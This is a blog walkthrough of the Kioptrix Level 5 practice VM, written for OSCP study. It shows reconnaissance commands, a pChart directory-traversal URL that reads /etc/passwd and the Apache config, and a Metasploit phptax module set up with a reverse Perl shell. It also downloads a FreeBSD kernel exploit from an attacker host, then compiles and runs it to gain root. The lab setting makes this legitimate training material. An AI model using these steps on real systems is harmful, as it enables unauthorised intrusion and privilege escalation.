Kioptrix: Level 5 Walkthrough
This is the fifth post of a series of posts I’m creating to study for OSCP. You can find the previous post by clicking here.
URL: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
Release date: 6 Apr 2014
Author: Kioptrix
Provided description: As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.
Vulnerabilities Found:
Kernel Exploit;
Directory Traversal;
Sensitive File Disclosure
Privilege Escalation;
Remote Code Execution
At the time of this writing, this is the last vm of the Kioptrix series. Come with me and see how exploit this machine.
#Scanning and Enumeration
To start getting information about the machine, we have to scan it.
Nmap
With nmap, we found that this vm is likely to be a FreeBSD one:
nmap -p- -A <ipAddress>
where:
-p- is going to scan all ports ;
-A Enable OS detection, version detection, script scanning, and traceroute;
Only 3 ports came up, but it should be enough to exploit.
Nikto
As with Nikto, we got an interesting information, maybe we can try to use it later on:
The exploit Nikto is mentioning is the same one we used in the first Kioptrix machine:
We will save this information for later.
Looking at the website on port 80, we don’t have anything interesting, only the following message:
Looking at the website on port 8080, we are not allowed to browse it:
But if we look at the source code of the page on port 80, there is something that can help us for sure:
it says “URL”, should we try to append this to the server url?
http://<ipaddress>/pChart2.1.3/index.php
It worked, and it opens a page with a software called pChart.
GoBuster
Now that we have something to explore, I ran gobuster to look what we have there:
gobuster dir -u http://<ipaddress>/pChart2.1.3/ -w <wordlistPath>/dirbuster/directory-list-2.3-medium.txt -t 50 -x .html,.php
Searching on the directories, there is nothing much useful for us, only an ordinary set of files.
#Exploiting
During the scanning phase, Nikto mentioned an exploit that could help us the exploit this machine. I tried the CVE that Nikto presented to us, but it didn’t work as expected. Try it for yourself:
Well, I never heard about pChart before, so I went through the internet to find any exploit available, and looking at the Exploit DB, I found a useful directory traversal exploit:
It states that if you run the following URL, you’ll be able to access files that you should not have access to:
http://<ipaddress>/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
There it is, information disclosure. but this file alone does not help us that much,I tried to show the /etc/shadow as well, but it didn’t work (for obvious reasons, the www user doesn’t have access to it). I then tried to find the server config files to see if we can find any juicy information. After searching a little bit, I found what is the path for the apache config files on FreeBSD:
usr/local/etc/apache22/httpd.conf
With that, we just append the path in the end of that URL:
I looked the whole file from top to bottom and in the end of the document, what I found useful is the following:
It says that we are allowed to browse the webserver running on port 8080 only with User-Agent being Mozilla 4. Remember that we didn’t have access to it? Well, now we can have access to this only if we meet this criteria. I have an extension here called User-Agent Switcher, which is really helpful because you can set whatever agent you want to test your applications.
Once you install it on your browser, click on the pencil button to edit the user-agent string:
Type Mozilla/4.0 and hit ‘OK’:
If we test the page now, we should have access to it:
You can also test it using curl with -A parameter, which let’s you enter your agent string:
curl -A “Mozilla/4.0 -L <ipaddress>:8080 ”
If we click on the link on that page, it shows us a software called phptax, another one that I had no clue about. Using the same process, let’s go ahead and search on the internet for exploits for this guy. The following exploits came up but they didn’t work for me:
Because I’m studying for the OCSP exam, I’m trying to avoid by all means to use Metasploit, but unfortunately, I couldn’t find any other payload that worked well, so I found and used the following metasploit module:
Then I started setting it up:
msfconsole
set payload cmd/unix/reverse_perl
set rhosts <VictimMachineIP>
set rport 8080
set lhost <attackerMachineIP>
set lport <someattackerMachinePort>
Once you are done configuring it, run the exploit using run or exploit:
We now have a low level user.
If this payload does not work for you, you can try the other ones in this list:
show payloads
My suggestion is the 7th one.
#Privilege Escalation
The first thing I tried was to find the OS version, just to make sure we have the exact version of it and see what we can exploit. You can run the command below to find the OS version:
uname -mrs
We can use the searchsploit tool and see if we have an exploit for FreeBSD 9:
searchsploit FreeBSD 9
The first one worked for me. It is a Kernel exploit for FreeBSD:
The second one didn’t:
Now that I have downloaded the exploit to my attacker machine, it is time to transfer it to the victim machine. Here I used the same approach as the other kioptrix machines, but instead of using wget, I used fetch:
#On the attacker machine:
python3 -m “http.server”
On the victim machine:
fetch http://<attackerIP>:8000/28718.c
All you have to do now is to compile the C file and run it:
gcc -o 28718 28718.c
./28718
Aaand, we are root! Go to /root and get your flag.
#Conclusion
This was the last machine of the Kioptrix series, I never used a FreeBSD before, so I learned a few things about it while exploiting this machine. The lack of a TTY shell gave me some difficulties while I was connected with a low level user there, but luckily it had an exploit for FreeBSD. I hope you liked it, if you have any questions, please do so in the comments section.
See you in the next post!
